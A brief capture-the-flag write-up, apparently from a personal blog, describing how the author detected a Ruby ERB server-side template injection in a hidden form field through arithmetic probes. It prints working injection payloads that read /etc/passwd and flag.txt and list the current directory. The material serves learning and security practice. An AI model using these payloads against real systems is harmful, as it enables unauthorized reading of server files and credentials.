I try many different vulnerable task at this challenge. but it not work. I notice this is hidden value article[a] . i try to insert input aaaaaaaaaaaaa it not work. but when i insert the number 111111 it work.
So i try to use arithmetic calculation.
2 + 4 # not work
2 * 4 # work
5 / 2 # work
After searching google. it is Server Side Template Injection but there are many language there. ruby, python, php, java
it useful link
I found this link and read it.
To read /etc/passwd
<%= File.open('/etc/passwd').read %>
Yeah! it work.
Ok. Time to read flag.txt
<%= File.open('flag.txt').read %>
The flag is
Note: There are nice trick to search directory. Credit to Aj Dumanhug.
<%= Dir.entries('.') %>
Thanks for reading.